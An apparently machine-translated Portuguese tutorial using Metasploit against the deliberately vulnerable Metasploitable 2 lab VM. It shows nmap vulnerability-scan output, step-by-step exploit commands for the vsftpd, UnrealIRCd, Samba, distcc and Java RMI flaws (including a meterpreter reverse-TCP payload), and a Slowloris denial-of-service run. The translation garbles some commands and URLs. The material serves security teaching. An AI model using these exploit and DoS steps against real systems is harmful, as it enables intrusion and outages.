10 principais exemplos de uso de metasploit

10 principais exemplos de uso de metasploit
O Metasploit é uma estrutura de segurança que vem com muitas ferramentas para exploração e teste do sistema. Este tutorial mostra 10 exemplos de ataques de hackers contra um alvo Linux. O Linux Target é um sistema de treinamento Metasploitable 2 OS, intencionalmente vulnerável para os usuários aprenderem como explorar suas vulnerabilidades. Este tutorial se concentra apenas em 10 ataques específicos de metasploit, para obter informações sobre a instalação metasploitável 2 Leia mais aqui.Para começar a baixar o metasploit.

No meu caso, baixei o Metasploit Pro Free Trial, mas você pode obter qualquer um deles.
A tela a seguir exigirá algumas de suas informações pessoais, preencha -as para passar para a página de download:

Baixe o metasploit para Linux:

Dê ao instalador que você acabou de baixar os direitos de execução executando:

# CHMOD +X METASPLOIT-LATEST-Linux-X64-Instalador.correr

Em seguida, execute o metasploit executando:

# ./metasploit-Latest-Linux-X64-Instalador.correr

Ao ver uma solicitação de GUI do instalador, clique em Avançar continuar:

Na próxima tela, aceite o contrato de licença e clique em Avançar:

Deixe o diretório padrão e pressione Avançar:

Quando perguntado se instalar o metasploit como serviço, a recomendação não é, se o fizer, o serviço de metasploit começará toda vez que você inicializará, se você pressionar Não O serviço de metasploit será lançado apenas mediante sua solicitação. Selecione sua escolha e pressione a frente para continuar:

Para evitar interferências, ao usar o metasploit, desligue seu firewall, pressione Avançar continuar:

A menos que a porta mostrada já esteja usada, pressione Avançar continuar:

Deixe localhost e pressione Avançar continuar:

Depois prosseguir com a prensa de instalação Avançar pela última vez:

O processo de instalação começará:

Finalmente, o metasploit foi instalado, apesar de não trabalharmos com a interface da web do metasploit, você pode marcá -lo para mantê -lo disponível. Imprensa Terminar para terminar.

Solução de problemas do Erro de DB de Metasploit:

No meu caso, quando lancei a metasploit, ele retornou o erro:

 Nenhum suporte ao banco de dados: não foi possível conectar ao servidor: a conexão recusada é o servidor em execução no host "localhost" (:: 1) e aceitar conexões TCP/IP na porta 7337? 

O motivo desse erro é a dependência PostgreSQL não foi instalada e o serviço de metasploit também.

Para resolvê -lo, execute:

# APT Install -y PostGresql

Em seguida, inicie o PostgreSQL executando:

# SUDO SERVIÇO POSTGRESQL START

E finalmente inicie o serviço de metasploit:

# SUDO Service Metasploit Start

Agora execute MSFCONSOLE Novamente e você notará que o erro desapareceu e estamos prontos para atacar o metasploitável 2:

Usando o metasploit para digitalizar um alvo de vulnerabilidades:

O primeiro passo é escanear nosso alvo para descobrir serviços e vulnerabilidades nele. Para alcançá -lo, usaremos o NMAP do Metasploit e seu script Vuln NSE (NMAP Script Motor) usado para detectar vulnerabilidades:

# db_nmap -v -script vuln 192.168.0.184

OBSERVAÇÃO: substituir 192.168.0.184 Para seu endereço IP de destino ou host.

Vamos analisar a saída do NMAP:

IMPORTANTE: Saída NMAP continha mais de 4000 linhas, portanto a saída foi reduzida, deixando as informações relevantes a serem explicadas.

As linhas a seguir apenas nos mostram os tipos inicializados de varreduras que envolvem NSE, ARP Ping Scan, DNS Resolution e uma Syn Stealth Scan. Todas essas etapas já foram claramente explicadas no Linuxhint.com NPIN e NMAP ARP Scan, usando scripts NMAP e varredura Stealth.

Observe que o NSE contém pré-execução, durante a execução da varredura e os scripts pós-execução que são executados antes, durante e após o início do processo de varredura e termina.

 msf5> db_nmap -v - -script vuln 192.168.0.184 [*] NMAP: Iniciando NMAP 7.70 (https: // nmap.org) em 2020-02-04 16:56 -03 [*] NMAP: NSE: carregado 103 scripts para digitalização. [*] NMAP: NSE: script pré-varredura. [*] NMAP: Iniciando NSE às 16:56 [*] NMAP: Concluído NSE às 16:57, 10.00s decorridos [*] NMAP: Iniciando NSE às 16:57 [*] NMAP: Concluído NSE às 16:57, 0.00s decorridos [*] nmap: iniciando o arp ping scan às 16:57 [*] nmap: varredura 192.168.0.184 [1 PORT] [*] NMAP: ARP PING CONCLUÍDO AS 16:57, 0.05s decorridos (1 hosts totais) [*] NMAP: Iniciando a resolução paralela DNS de 1 host. às 16:57 [*] NMAP: Resolução DNS paralela concluída de 1 host. às 16:57, 0.02S decorrido [*] NMAP: Iniciando Syn Stealth Scan às 16:57 [*] NMAP: Digitalização 192.168.0.184 [1000 portas] 

O próximo extrato mostra quais serviços estão disponíveis em nosso alvo:

 [*] NMAP: descoberta a porta aberta 25/TCP em 192.168.0.184 [*] NMAP: descoberta a porta aberta 80/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 445/TCP em 192.168.0.184 [*] NMAP: descoberta a porta aberta 139/TCP em 192.168.0.184 [*] NMAP: descoberta porta aberta 3306/tcp em 192.168.0.184 [*] NMAP: descoberta porta aberta 5900/tcp em 192.168.0.184 [*] NMAP: Descoberto Open Port 22/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 53/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 111/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 21/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 23/TCP em 192.168.0.184 [*] NMAP: descoberta a porta aberta 1099/TCP em 192.168.0.184 [*] NMAP: descoberta porta aberta 512/tcp em 192.168.0.184 [*] NMAP: descoberta a porta aberta 1524/TCP em 192.168.0.184 [*] NMAP: descoberta porta aberta 513/tcp em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 514/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 2121/TCP em 192.168.0.184 [*] NMAP: descoberta porta aberta 6000/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 2049/TCP em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 6667/TCP em 192.168.0.184 [*] NMAP: descoberta a porta aberta 8009/TCP em 192.168.0.184 [*] NMAP: descoberta porta aberta 5432/tcp em 192.168.0.184 [*] NMAP: Descoberta a porta aberta 8180/TCP em 192.168.0.184 [*] NMAP: Concluído Syn Stealth Scan às 16:57, 0.12s decorridos (1000 portas totais) 

O relatório de extração a seguir NSE POST SCAN Scripts Execution para encontrar vulnerabilidades:

 [*] NMAP: NSE: Script Digiting 192.168.0.184. [*] NMAP: Iniciando NSE às 16:57 [*] NMAP: Concluído NSE às 17:02, 322.44s decorridos [*] NMAP: Iniciando NSE às 17:02 [*] NMAP: Concluído NSE às 17:02, 0.74s decorridos [*] NMAP: Relatório de varredura NMAP para 192.168.0.184 [*] NMAP: o host está em alta (0.00075s latência). [*] NMAP: não mostrado: 977 portas fechadas 

Como você pode ver, o NMAP já encontrou orifícios de segurança ou vulnerabilidades no serviço FTP de destino, ele até nos vincula explorações para hackear o alvo:

 [*] NMAP: Serviço de Estado de Porto [*] NMAP: 21/TCP aberto FTP [*] NMAP: | ftp-vsftpd-backdoor: [*] nmap: | Vulnerável: [*] NMAP: | VSFTPD Versão 2.3.4 backdoor [*] nmap: | Estado: vulnerável (explorável) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD Versão 2.3.4 backdoor, isso foi relatado em 2011-07-04. [*] NMAP: | Data de divulgação: 2011-07-03 [*] NMAP: | Explorar resultados: [*] NMAP: | Comando do shell: id [*] nmap: | Resultados: uid = 0 (root) gid = 0 (root) [*] nmap: | Referências: [*] NMAP: | http: // ScaryBeastSecurity.Blogspot.com/2011/07/alert-vsftpd-do-download.html [*] nmap: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/rapid7/metasploit-framework/blob/master/modules/explorait/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2011-2523 

Abaixo, você pode ver, além dos orifícios de segurança do FTP, o NMAP detectou vulnerabilidades SSL:

[*] NMAP: | _SSLV2-DROWN: [*] NMAP: 22/TCP OPEN SSH [*] NMAP: 23/TCP aberto Telnet [*] NMAP: 25/TCP Abrir Smtp [*] NMAP: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ O servidor SMTP não é exim: não é vulnerável [*] nmap: | SSL-DH-Params: [*] NMAP: | Vulnerável: [*] NMAP: | Vulnerabilidade anônima de troca de key mitm de troca de key hellman [*] nmap: | Estado: Vulnerável [*] NMAP: | Serviços de segurança da camada de transporte (TLS) que usam [*] nmap anônimo: | Diffie-Hellman A troca de chaves fornece apenas proteção contra [*] nmap passivo: | Espora e são vulneráveis ​​a ataques ativos de homem no meio [*] nmap: | que poderia comprometer completamente a confidencialidade e a integridade [*] NMAP: | de qualquer dados trocado pela sessão resultante. [*] NMAP: | Verifique os resultados: [*] NMAP: | Grupo 1 do DH anônimo [*] NMAP: | Suíte Cipher: TLS_DH_ANON_WITH_AES_256_CBC_SHA [*] NMAP: | Tipo de módulo: Prime seguro [*] nmap: | Modulus Fonte: Postfix Buildin [*] NMAP: | Comprimento do módulo: 1024 [*] NMAP: | Comprimento do gerador: 8 [*] NMAP: | Comprimento da chave pública: 1024 [*] NMAP: | Referências: [*] NMAP: | https: // www.IETF.org/rfc/rfc2246.txt [*] nmap: | [*] NMAP: | Protocolo de segurança da camada de transporte (TLS) DHE_EXPORT CIPHERS Downgrade MITM (LOGJAM) [*] NMAP: | Estado: Vulnerável [*] NMAP: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | O protocolo de segurança da camada de transporte (TLS) contém uma falha que é [*] NMAP: | acionado ao manusear trocas de chave Diffie-Hellman definidas com [*] nmap: | a cifra dhe_export. Isso pode permitir um atacante de homem no meio [*] nmap: | Para fazer o downgrade da segurança de uma sessão TLS para o nível de exportação de 512 bits [*] NMAP: | Criptografia, que é significativamente mais fraca, permitindo o invasor [*] NMAP: | Para quebrar mais facilmente a criptografia e monitorar ou violar com [*] nmap: | o fluxo criptografado. [*] NMAP: | Data de divulgação: 2015-5-19 [*] NMAP: | Verifique os resultados: [*] NMAP: | Grupo 1 do DH de exportação 1 [*] NMAP: | Suíte cipher: tls_dhe_rsa_export_with_des40_cbc_sha [*] nmap: | Tipo de módulo: Prime seguro [*] nmap: | Fonte do módulo: NMAP (desconhecido/gerado personalizado [*]: | Módulo Comprimento: 512 [*] NMAP: | Comprimento do gerador: 8 [*] NMAP: | Comprimento da chave pública: 512 [*] NMAP: | Referências: [*] NMAP: | https: // fracardh.org [*] nmap: | http: // osvdb.org/122331 [*] nmap: | https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2015-4000 [*] NMAP: | [*] NMAP: | Diffie-Hellman Chave Exchange Insuficiência de Grupo Resistência [*] NMAP: | Estado: Vulnerável [*] NMAP: | Serviços de segurança da camada de transporte (TLS) que usam grupos Diffie-Hellman [*] NMAP: | de força insuficiente, especialmente aqueles que usam um dos poucos [*] nmap: | Grupos compartilhados, podem ser suscetíveis a ataques passivos de escutas. [*] NMAP: | Verifique os resultados: [*] NMAP: | FRACO DH GRUPO 1 [*] NMAP: | Suíte cipher: tls_dhe_rsa_with_des_cbc_sha [*] nmap: | Tipo de módulo: Prime seguro [*] nmap: | Modulus Fonte: Postfix Buildin [*] NMAP: | Comprimento do módulo: 1024 [*] NMAP: | Comprimento do gerador: 8 [*] NMAP: | Comprimento da chave pública: 1024 [*] NMAP: | REFERÊNCIAS: [*] NMAP: | _ https: // fracas.org [*] nmap: | SSL-Poodle: [*] NMAP: | Vulnerável: [*] NMAP: | SSL Poodle Information Cake [*] NMAP: | Estado: Vulnerável [*] NMAP: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | O protocolo SSL 3.0, conforme usado no OpenSSL até 1.0.1i e outros [*] nmap: | Produtos, usa preenchimento de CBC não determinístico, o que facilita [*] NMAP: | Para os atacantes do Man-in-the-Middle obterem dados claros de texto transparente por meio de um [*] NMAP: | Ataque de acolchoamento, também conhecido como a questão do "poodle". [*] NMAP: | Data de divulgação: 2014-10-14 [*] NMAP: | Verifique os resultados: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Referências: [*] NMAP: | https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2014-3566 [*] NMAP: | https: // www.OpenSSL.org/~ bodo/ssl-poodle.pdf [*] nmap: | https: // www.Imperialviolet.org/2014/10/14/poodle.html [*] nmap: | _ http: // osvdb.org/113251 [*] nmap: | SSLV2-Drown: [*] NMAP: | cifras: [*] nmap: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | Ssl2_des_192_ede3_cbc_with_md5 [*] nmap: | SSL2_RC2_128_CBC_WITH_MD5 [*] NMAP: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] NMAP: | CVE-2016-0703: [*] NMAP: | Título: OpenSSL: Divide-and-Conquer Session Key Recuperação em SSLV2 [*] NMAP: | Estado: Vulnerável [*] NMAP: | IDS: [*] NMAP: | CVE: CVE-2016-0703 [*] NMAP: | Descrição: [*] NMAP: | A função get_client_master_key em S2_SRVR.C Na implementação SSLV2 em [*] NMAP: | OpenSSL antes de 0.9.8zf, 1.0.0 antes de 1.0.0R, 1.0.1 antes de 1.0.1m e 1.0.2 antes de [*] NMAP: | 1.0.2a aceita um valor de chave clara de tecla de cliente diferente de zero para um arbitrário [*] NMAP: | Cipher, que permite que os atacantes do Man-in-the-Middle determinem o valor da chave mestre [*] NMAP: | e descriptografar os dados da CipherText, aproveitando um bleichenbacher rsa preenchendo o Oracle, um [*] nmap: | Problema relacionada ao CVE-2016-0800. [*] NMAP: | [*] NMAP: | Refs: [*] NMAP: | https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2016-0703 [*] NMAP: | https: // www.OpenSSL.org/news/secadv/20160301.TXT 

O extrato a seguir mostra que muitas vulnerabilidades foram encontradas no servidor da web, incluindo acesso a páginas de login sensíveis e negação de vulnerabilidades de serviço.

 [*] NMAP: 53/TCP OPEN DOMAIN [*] NMAP: 80/TCP aberto http [*] nmap: | http-csrf: [*] nmap: | Spiders limitado a: maxDepth = 3; maxpageCount = 20; dentro de Host = 192.168.0.184 [*] NMAP: | Encontrou as seguintes vulnerabilidades possíveis do CSRF: [*] NMAP: | [*] NMAP: | Caminho: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | ID do formulário: [*] NMAP: | Ação do formulário: login.php [*] nmap: | [*] NMAP: | Caminho: http: // 192.168.0.184: 80/dvwa/login.php [*] nmap: | ID do formulário: [*] NMAP: | _ Ação do formulário: login.php [*] nmap: | _http-dombased-xss: não conseguiu encontrar nenhum XSS baseado em DOM. [*] NMAP: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /teste/: página de teste [*] nmap: | /phpinfo.PHP: Possível arquivo de informações [*] NMAP: | /phpmyadmin/: phpmyadmin [*] nmap: | /doc/: diretório potencialmente interessante com listagem em 'Apache/2.2.8 (Ubuntu) DAV/2 '[*] NMAP: | /icons/: pasta potencialmente interessante com listagem de diretórios [*] nmap: | _/index/: pasta potencialmente interessante [*] nmap: | http-slowloris-check: [*] nmap: | Vulnerável: [*] NMAP: | Slowloris Dos ataque [*] NMAP: | Estado: provavelmente vulnerável [*] nmap: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris tenta manter muitas conexões com o servidor da web de destino aberto e segurar [*] nmap: | eles abrem o maior tempo possível. Isso faz isso abrindo conexões para [*] nmap: | o servidor da Web de destino e enviando uma solicitação parcial. Ao fazer isso, fome [*] nmap: | Os recursos do servidor HTTP causando negação de serviço. [*] NMAP: | [*] NMAP: | Data de divulgação: 2009-09-17 [*] NMAP: | Referências: [*] NMAP: | http: // ha.ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2007-6750 

Nesta fase, o NMAP encontrou muitas vulnerabilidades de injeção de SQL, a quantidade de vulnerabilidades era tão grande para este tutorial que removi muitos deles e deixei alguns:

 [*] NMAP: | Injeção HTTP-SQL: [*] NMAP: | SQLI possível para consultas: [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = n%3BO%3dd%27%20or%20SqlSpider [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = S%3BO%3DA%27%20Or%20SQLspider [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = M%3BO%3DA%27%20Or%20SQLspider [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = D%3BO%3DA%27%20Or%20SQLspider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Pen-Test-tool-Lookup.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = documentação%2fvulnerabilidades.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Capture-Data.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = text-file-viewer.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/?página = add-to-your-blog.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/?página = show-log.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = registro.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = HTML5-Storage.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = usuário-info.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = home.php & do = altern-tons%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = show-log.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = notas.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = enquadramento.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = PHP-Errors.php%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = home.PHP & DO = TOGLGLE-Security%27%20Or%20SQLSpider 

Abaixo do NMAP deca a vulnerabilidades XSS novamente (como no primeiro extrato) e relatórios

INVACIONAL DE MÉTODO REMOTO (RMI) Buracos de segurança devido à configuração errada, permitindo que um invasor permita a execução de código Java malicioso:

 [*] Nmap: | _http-armazenado-xss: não conseguiu encontrar nenhuma vulnerabilidade XSS armazenada. [*] Nmap: | _http-trace: rastreio está ativado [*] nmap: | _http-vuln-cve2017-1001000: erro: a execução do script falhou (use -d para depurar) [*] nmap: 111/tcp aberto rpcbind [d [ *] Nmap: 139/tcp aberto netbios-ssn [*] nmap: 445/tcp aberto microsoft-ds [*] nmap: 512/tcp aberto exec [*] nmap: 513/tcp aberto login [*] nmap: 514/ tcp abeto aberto [*] nmap: 1099/tcp aberto rmiregistry [*] nmap: | RMI-VULN-ClassLoader: [*] NMAP: | Vulnerável: [*] NMAP: | RMI Registry Configuração padrão Execução de código remoto Vulnerabilidade [*] NMAP: | Estado: Vulnerável [*] NMAP: | A configuração padrão do registro RMI permite o carregamento de classes de URLs remotos que podem levar à execução do código remoto. [*] NMAP: | [*] NMAP: | REFERÊNCIAS: [*] NMAP: | _ https: // github.com/rapid7/metasploit-framework/blob/master/modules/exploraits/multi/misc/java_rmi_server.rb 

Abaixo, você pode ver vulnerabilidades SSL adicionais foram encontradas:

 [*] NMAP: | Injeção SSL-CCS: [*] NMAP: | Vulnerável: [*] NMAP: | SSL/TLS MITM Vulnerabilidade (injeção de CCS) [*] NMAP: | Estado: Vulnerável [*] NMAP: | Fator de risco: alto [*] NMAP: | OpenSSL antes de 0.9.8za, 1.0.0 antes de 1.0.0m e 1.0.1 antes de 1.0.1H [*] NMAP: | Não restringe adequadamente o processamento de mensagens ChanGecipherspec, [*] NMAP: | que permite que os atacantes do Man-in-the-Middle acionem o uso de um NMAP zero [*]: | Chave mestre de comprimento em determinadas comunicações OpenSSL-to-OpenSSL e [*] NMAP: | Consequentemente, sessões de sequestrar sessões ou obter informações confidenciais, via [*] nmap: | Um aperto de mão TLS criado, também conhecido como a vulnerabilidade da "injeção do CCS". [*] NMAP: | [*] NMAP: | Referências: [*] NMAP: | https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2014-0224 [*] NMAP: | http: // www.Cvevedetails.com/cve/2014-0224 [*] nmap: | _ http: // www.OpenSSL.org/news/secadv_20140605.txt [*] nmap: | SSL-DH-Params: [*] NMAP: | Vulnerável: [*] NMAP: | Diffie-Hellman Chave Exchange Insuficiência de Grupo Resistência [*] NMAP: | Estado: Vulnerável [*] NMAP: | Serviços de segurança da camada de transporte (TLS) que usam grupos Diffie-Hellman [*] NMAP: | de força insuficiente, especialmente aqueles que usam um dos poucos [*] nmap: | Grupos compartilhados, podem ser suscetíveis a ataques passivos de escutas. [*] NMAP: | Verifique os resultados: [*] NMAP: | FRACO DH GRUPO 1 [*] NMAP: | Suíte cipher: tls_dhe_rsa_with_aes_128_cbc_sha [*] nmap: | Tipo de módulo: Prime seguro [*] nmap: | Fonte do módulo: NMAP (desconhecido/gerado personalizado [*]: | Comprimento do módulo: 1024 [*] NMAP: | Comprimento do gerador: 8 [*] NMAP: | Comprimento da chave pública: 1024 [*] NMAP: | REFERÊNCIAS: [*] NMAP: | _ https: // fracas.org [*] nmap: | SSL-Poodle: [*] NMAP: | Vulnerável: [*] NMAP: | SSL Poodle Information Cake [*] NMAP: | Estado: Vulnerável [*] NMAP: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | O protocolo SSL 3.0, conforme usado no OpenSSL até 1.0.1i e outro 

O próximo extrato mostra que nosso alvo está possivelmente infectado com um Trojan contra um serviço de IRC:

 [*] Nmap: | _irc-unrealircd-backdoor: parece uma versão trojanada do Unrealircd. Veja http: // seclistas.org/fullDisclosure/2010/jun/277 [*] nmap: 8009/tcp aberto ajp13 

O extrato a seguir mostra que a bandeira httponly não está configurada corretamente; portanto, o alvo é vulnerável a ataques de scripts cruzados:

 [*] NMAP: 8180/tcp aberto desconhecido [*] nmap: | HTTP-Cookie-Flags: [*] NMAP: | /admin/: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /admin/índice.html: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /admin/login.html: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /Admin/Admin.html: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /admin/conta.html: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionId: [*] NMAP: | sinalizador httponly não definido [*] nmap: | /Admin/Home.html: 

O extrato a seguir enumera ou lista diretórios acessíveis interessantes encontrados em nosso alvo:

 [*] NMAP: | http-enum: [*] nmap: | /admin/: Possível pasta de administrador [*] nmap: | /admin/índice.HTML: Possível pasta de administrador [*] NMAP: | /admin/login.HTML: Possível pasta de administrador [*] NMAP: | /Admin/Admin.HTML: Possível pasta de administrador [*] NMAP: | /admin/conta.HTML: Possível pasta de administrador [*] NMAP: | /admin/admin_login.HTML: Possível pasta de administrador [*] NMAP: | /Admin/Home.HTML: Possível pasta de administrador [*] NMAP: | /admin/admin-login.HTML: Possível pasta de administrador [*] NMAP: | /admin/adminlogin.HTML: Possível pasta de administrador [*] NMAP: | /admin/ControlPanel.HTML: Possível pasta de administrador [*] NMAP: | /admin/cp.HTML: Possível pasta de administrador [*] NMAP: | /admin/índice.JSP: Possível pasta de administração 

Finalmente, a varredura termina e o NSE pós-varredura é executado:

 [*] NMAP: | [*] NMAP: | Data de divulgação: 2009-09-17 [*] NMAP: | Referências: [*] NMAP: | http: // ha.ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2007-6750 [*] NMAP: MAC Endereço: 08: 00: 27: dd: 87: 8c (Oracle VirtualBox Virtual NIC) [*] NMAP: Resultados do script do host: [*] nmap: | _smb-vuln -ms10-054: false [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: script pós-varredura. [*] NMAP: Iniciando NSE às 17:02 [*] NMAP: Concluído NSE às 17:02, 0.00s decorridos [*] NMAP: Iniciando NSE às 17:02 [*] NMAP: Concluído NSE às 17:02, 0.00S decorridos [*] nmap: Leia os arquivos de dados de:/opt/metasploit/Common/share/nmap/[*] nmap: nmap feito: 1 endereço IP (1 host up) digitalizado em 333.96 segundos [*] NMAP: pacotes brutos enviados: 1001 (44.028KB) | RCVD: 1001 (40.120KB) msf5> 

Agora identificamos alguns orifícios de segurança para atacar nosso alvo.

Usando o metasploit para hackear um servidor FTP:

Depois de identificar orifícios de segurança em seu alvo, use comandos de metasploit para encontrar explorações adequadas contra eles. Como você viu anteriormente, uma das primeiras vulnerabilidades encontradas foi no servidor vsftpd, para encontrar explorações adequadas, dentro da Run Metasploit:

# Search vsftpd

Como você vê, o metasploit contém um backdoor que possivelmente pode nos ajudar a hackear nosso alvo FTP. Para usar esta exploração, no metasploit run:

# Use exploração/unix/ftp/vsftpd_234_backdoor

Para aprender a usar qualquer Exploração específica Run:

# Mostrar opções

Como você vê acima, esta exploração contém 2 opções, Rhosts (host remoto) e RPORT. Precisamos especificar o rhost, a porta já está especificada (21).
Para definir o host remoto (RHOST), definindo a execução IP de destino:

# Definir Rhost 192.168.0.184

Uma vez definido o alvo, execute o comando seguinte para explorar o buraco de segurança:

# explorar

Como você pode ver, eu peguei uma concha no alvo, ao executar "ls", posso ver os arquivos de destino, o ataque foi bem -sucedido. Para deixar o alvo, basta correr:

#saída

Usando metasploit para ataque de DOS:

Como você viu durante o processo de varredura, foi encontrada uma vulnerabilidade do DOS Slowloris, a fim de descobrir como explorá -lo seguindo as etapas anteriores para procurar uma ferramenta adequada, neste caso um módulo auxiliar em vez de uma exploração:

# Search Slowloris

Depois de encontrarmos uma ferramenta para atacar, corra:

# Use auxiliar/dos/http/slowloris
# Definir Rhost 192.168.0.184

Então basta digitar:

# correr

Você notará enquanto o ataque é executado, o serviço HTTP de destino não estará disponível, ele continua carregando:

Uma vez que paramos o ataque pressionando Ctrl+C O servidor estará disponível novamente:

Usando o metasploit para hackear um servidor IRC:

O bate -papo de revezamento na Internet é amplamente usado em todo o mundo, como você pode notar durante os primeiros estágios do Scan Metasploit possivelmente encontrou um serviço IRC (irreal IRCD) infectado com um Trojan.

Vamos repetir as etapas para encontrar uma ferramenta para invadi -la:

# Pesquise IRCD irreal
# Use exploração/unix/irc/unreal_ircd_3281_backdoor
# Mostrar opções
# Definir Rhost 192.168.0.184

Então corra:

# explorar

E como você pode ver novamente, temos uma sessão de concha dentro do alvo.

Usando o metasploit para executar o código malicioso Java:

# Use exploração/multi/misc/java_rmi_server
# Mostrar opções
# Definir Rhost 192.168.0.184
# mostre cargas úteis
# Definir carga útil Java/Meterpreter/Reverse_tcp
# Definir Lhost 192.168.0.50
# explorar

Usando o metasploit para invadir a vulnerabilidade do script de UserMap Samba:

Algumas etapas como a pesquisa de explorações serão omitidas para evitar um tutorial enorme. Para explorar esta execução de vulnerabilidade:

# Use exploração/multi/samba/userMap_script
# Mostrar opções

Defina o IP de destino e explorá -lo executando:

# Definir Rhost 192.168.0.184
# explorar

Como você pode ver, ganhamos uma concha em nosso alvo.

Usando o metasploit para explorar a execução do comando daemon Distcc:

Esta vulnerabilidade é explicada aqui.

Para começar a ser executada:

# Use exploração/unix/misc/distcc_exec

Então corra:

# Definir Rhost 192.168.0.184
# explorar

Como você pode ver, ganhamos acesso ao alvo novamente.

Usando metasploit para digitalização por porta (maneira adicional sem NMAP):

Realizando uma varredura TCP com metasploit:

Para executar uma varredura diferente sem usar o NMAP metasploit oferece alternativas que você pode encontrar executando:

# Search PortScan

Para fazer uma execução de varredura TCP:

# Use Scanner/PortScan/TCP
# Definir Rhost 192.168.0.184

Para ver opções adicionais:

# Mostrar opções

Escolha o intervalo de portas que você deseja digitalizar executando:

# Configurar portas 21-35

Em seguida, execute a varredura executando:

# correr

Como você pode ver, as portas 22,25,23 e 21 foram encontradas abertas.

Realizando uma varredura syn com metasploit:

Para uma corrida de varredura SYN:

# Use auxiliar/scanner/PortScan/syn
# Definir Rhost 192.168.0.184
# defina portas 80
# correr

Como você pode ver, a porta 80 foi encontrada aberta.

CONCLUSÃO

Metasploit é como uma faca do exército suíço que tem tantas funções. Espero que você tenha achado este tutorial sem metasplo. Continue seguindo o Linuxhint para obter mais dicas e atualizações no Linux e na rede.